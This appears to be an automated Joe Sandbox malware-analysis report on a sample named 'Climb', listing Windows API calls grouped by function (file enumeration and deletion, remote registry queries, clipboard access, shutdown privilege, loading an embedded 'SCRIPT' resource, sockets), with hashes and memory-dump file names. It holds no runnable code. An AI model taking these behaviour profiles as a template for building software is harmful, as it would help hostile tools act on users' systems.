                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                          • String ID: :$\$\??\%s
                                                                                                                                                                          • API String ID: 1149970189-3457252023
                                                                                                                                                                          • Opcode ID: e0f3174437903278ea97779cb84a9a745a6ff1c077c8cb8a25c9e6c51734f226
                                                                                                                                                                          • Instruction ID: d9fdd621a5e7c6c39434c5785eb3428dbe44fb39b75faaf0f274b829f5feddc9
                                                                                                                                                                          • Opcode Fuzzy Hash: e0f3174437903278ea97779cb84a9a745a6ff1c077c8cb8a25c9e6c51734f226
                                                                                                                                                                          • Instruction Fuzzy Hash: 54318D71900249ABDB21DFA0DC49FEF37BDEF89740F1041B6F60A96160EB709645CB64
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00ADA203
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00ADA25E
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00ADA269
                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00ADA285
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00ADA2D5
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00B27B94), ref: 00ADA2F3
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ADA2FD
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00ADA30A
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00ADA31A
                                                                                                                                                                            • Part of subcall function 00ACE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00ACE3B4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 2640511053-438819550
                                                                                                                                                                          • Opcode ID: fdc5509ff700408ca27b23746848b546aff9e8a9472e37c890c8053f394ae052
                                                                                                                                                                          • Instruction ID: c6dc27444d10d840a64c9bcefad1a5fb8fd6792a0ca23157c45b8fd7835e8a52
                                                                                                                                                                          • Opcode Fuzzy Hash: fdc5509ff700408ca27b23746848b546aff9e8a9472e37c890c8053f394ae052
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F3112315006196ACF15EFF5EC09EEE77AEAF55320F104192F816A32A0EB31DE86CA55
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEC10E,?,?), ref: 00AED415
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED451
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4C8
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEC99E
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00AECA09
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00AECA2D
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00AECA8C
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AECB47
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AECBB4
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AECC49
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00AECC9A
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AECD43
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AECDE2
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00AECDEF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3102970594-0
                                                                                                                                                                          • Opcode ID: 870f98e454c656c2dfc99ec790847fed9c895d19eb72912169df9e102a6c8b14
                                                                                                                                                                          • Instruction ID: c4aea25b1977aa5d64c4ad6161e88333a3726bc5cae6fc86663fb22b001100a8
                                                                                                                                                                          • Opcode Fuzzy Hash: 870f98e454c656c2dfc99ec790847fed9c895d19eb72912169df9e102a6c8b14
                                                                                                                                                                          • Instruction Fuzzy Hash: A7025171604240AFC715DF25C995E2ABBF5EF88314F1884ADF84ACB2A2DB31ED46CB51
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A65851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A655D1,?,?,00AA4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A65871
                                                                                                                                                                            • Part of subcall function 00ACEAB0: GetFileAttributesW.KERNEL32(?,00ACD840), ref: 00ACEAB1
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00ACD9CD
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00ACDA88
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00ACDA9B
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00ACDAB8
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ACDAE2
                                                                                                                                                                            • Part of subcall function 00ACDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00ACDAC7,?,?), ref: 00ACDB5D
                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 00ACDAFE
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00ACDB0F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                          • API String ID: 1946585618-1173974218
                                                                                                                                                                          • Opcode ID: 39d2b7d42b3f8e7c844a9f1d314d2a1f6ba6ce1bf8b47a3d191df52f3d6554f3
                                                                                                                                                                          • Instruction ID: bf520ab26f2b2a1a45c5182fe1b5e5f25a272266fbf216fc8cd555ebc1f5399d
                                                                                                                                                                          • Opcode Fuzzy Hash: 39d2b7d42b3f8e7c844a9f1d314d2a1f6ba6ce1bf8b47a3d191df52f3d6554f3
                                                                                                                                                                          • Instruction Fuzzy Hash: E7612E3180510DEECF16EBE0DA92EEDB7B5AF14340F6541A9E406B7191EB319F49CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1737998785-0
                                                                                                                                                                          • Opcode ID: 0bec854ee339801e8ee2c1fadf42bf0dad4f74c5374cfd47788a445041a84ea4
                                                                                                                                                                          • Instruction ID: 9559a854a7d838ec7d33541e19e5810ef1e30cda54a528fc2a2692de7f2746fb
                                                                                                                                                                          • Opcode Fuzzy Hash: 0bec854ee339801e8ee2c1fadf42bf0dad4f74c5374cfd47788a445041a84ea4
                                                                                                                                                                          • Instruction Fuzzy Hash: F141AB34A04601AFD311CF55D888B6ABBE5FF44318F14C0AAE81A8F762CB35EC42DB91
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AC2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AC205A
                                                                                                                                                                            • Part of subcall function 00AC2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AC2087
                                                                                                                                                                            • Part of subcall function 00AC2010: GetLastError.KERNEL32 ref: 00AC2097
                                                                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00ACF249
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                          • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                          • API String ID: 2234035333-3163812486
                                                                                                                                                                          • Opcode ID: 4d91a8fc3a9e8af1d807aa22602444e1f6389661972b0136ebed72101807e416
                                                                                                                                                                          • Instruction ID: 7481e7bff31ad0da8f9da8d950c8ff8df1875df18d87221e9c74e486a9794f50
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d91a8fc3a9e8af1d807aa22602444e1f6389661972b0136ebed72101807e416
                                                                                                                                                                          • Instruction Fuzzy Hash: 0001D67A6102106FEB1463F89D8AFFE72AD9B08344F170539FD03E21D2D9604D019190
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00A9BD54
                                                                                                                                                                          • _free.LIBCMT ref: 00A9BD78
                                                                                                                                                                          • _free.LIBCMT ref: 00A9BEFF
                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B046D0), ref: 00A9BF11
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00B3221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A9BF89
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00B32270,000000FF,?,0000003F,00000000,?), ref: 00A9BFB6
                                                                                                                                                                          • _free.LIBCMT ref: 00A9C0CB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 314583886-0
                                                                                                                                                                          • Opcode ID: 91a97bd1cea25cae3e9a49ac1a84b546c9a4c0a7d4927a95998ba70ab520a8e0
                                                                                                                                                                          • Instruction ID: e05ecb1ca4d32b1e5f778fdd7defb64c76c565b82985bd55480d3f7cad5e0808
                                                                                                                                                                          • Opcode Fuzzy Hash: 91a97bd1cea25cae3e9a49ac1a84b546c9a4c0a7d4927a95998ba70ab520a8e0
                                                                                                                                                                          • Instruction Fuzzy Hash: DAC11971B10209AFDF259F78EE41BAE7BF9EF45310F24419AE5419B291EB309E41CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AA56C2,?,?,00000000,00000000), ref: 00AD3A1E
                                                                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA56C2,?,?,00000000,00000000), ref: 00AD3A35
                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00AA56C2,?,?,00000000,00000000,?,?,?,?,?,?,00A666CE), ref: 00AD3A45
                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00AA56C2,?,?,00000000,00000000,?,?,?,?,?,?,00A666CE), ref: 00AD3A56
                                                                                                                                                                          • LockResource.KERNEL32(00AA56C2,?,?,00AA56C2,?,?,00000000,00000000,?,?,?,?,?,?,00A666CE,?), ref: 00AD3A65
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                                          • Opcode ID: a88cec8225e4b221a1e5553c0d8017c742d3ba382d5c9e163e95c27d71cadc8b
                                                                                                                                                                          • Instruction ID: 11a444d95b12979bf323ed631c529183906b0333b715a733879a0364ea937170
                                                                                                                                                                          • Opcode Fuzzy Hash: a88cec8225e4b221a1e5553c0d8017c742d3ba382d5c9e163e95c27d71cadc8b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C117C71200701BFDB218BA5DC48FA77BBAEBC5B90F14426DB402D6260DBB2DD01C661
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AC1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AC1916
                                                                                                                                                                            • Part of subcall function 00AC1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AC1922
                                                                                                                                                                            • Part of subcall function 00AC1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AC1931
                                                                                                                                                                            • Part of subcall function 00AC1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AC1938
                                                                                                                                                                            • Part of subcall function 00AC1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AC194E
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00AC1C81), ref: 00AC20FB
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AC2107
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00AC210E
                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AC2127
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00AC1C81), ref: 00AC213B
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00AC2142
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3008561057-0
                                                                                                                                                                          • Opcode ID: 45cea27d94abecf51a989bb41c69b865da30badabd988610aeafef22af6e6186
                                                                                                                                                                          • Instruction ID: 5f362bc471032878ede2d599102396d744e7eef3b36cb8605a8fc3d36e704fee
                                                                                                                                                                          • Opcode Fuzzy Hash: 45cea27d94abecf51a989bb41c69b865da30badabd988610aeafef22af6e6186
                                                                                                                                                                          • Instruction Fuzzy Hash: 3A11AC71600204FFDB21DBE8DC09FAE7BBAEF45356F19421DE94297120C7359941DB64
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00ADA5BD
                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00ADA6D0
                                                                                                                                                                            • Part of subcall function 00AD42B9: GetInputState.USER32 ref: 00AD4310
                                                                                                                                                                            • Part of subcall function 00AD42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AD43AB
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00ADA5ED
                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00ADA6BA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 1972594611-438819550
                                                                                                                                                                          • Opcode ID: 86fbc9de64559d1a7fba2a4c0d77a07a37769ca94bc0388d1568ad94415316ed
                                                                                                                                                                          • Instruction ID: 531ff510aa165c02fbc390f67fe20b8c785f578e88f8e5b7ec1447e58cf06307
                                                                                                                                                                          • Opcode Fuzzy Hash: 86fbc9de64559d1a7fba2a4c0d77a07a37769ca94bc0388d1568ad94415316ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 8241717190020AEFCF15EFA4DD49AEEBBB5EF15310F144156E806A22A1EB31DE84CF61
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefDlgProcW.USER32(?,?), ref: 00A6233E
                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00A62421
                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00A62434
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$Proc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 929743424-0
                                                                                                                                                                          • Opcode ID: 59dc7d13f77897c5783c8603d5fdfb166d4a53f4a32ce4f0478bfa6eed33a49a
                                                                                                                                                                          • Instruction ID: 7dd7dedcdb8575f1fffd6a57af68ce02dc60b550fc12b7182d909a156769d7fc
                                                                                                                                                                          • Opcode Fuzzy Hash: 59dc7d13f77897c5783c8603d5fdfb166d4a53f4a32ce4f0478bfa6eed33a49a
                                                                                                                                                                          • Instruction Fuzzy Hash: 238102B1104904BEEA29AB788D98FBF297EEB47340B154509F202CF6D5CB59CE429376
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AE3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AE3AD7
                                                                                                                                                                            • Part of subcall function 00AE3AAB: _wcslen.LIBCMT ref: 00AE3AF8
                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AE22BA
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00AE22E1
                                                                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00AE2338
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00AE2343
                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 00AE2372
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1601658205-0
                                                                                                                                                                          • Opcode ID: dd6ba3a97ddfacc17dbdc0dc7ff3f8ae54dd67ce7b0628b268e885086dda1fbb
                                                                                                                                                                          • Instruction ID: ff3cde8849d04319a5d76cfd2f05dd66e180831082ecfec1891115ce70ccb689
                                                                                                                                                                          • Opcode Fuzzy Hash: dd6ba3a97ddfacc17dbdc0dc7ff3f8ae54dd67ce7b0628b268e885086dda1fbb
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E51C375A00200AFE711EF64C986F6A77E9AB44758F08C098F9455F3C3DA75AD42CBE1
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
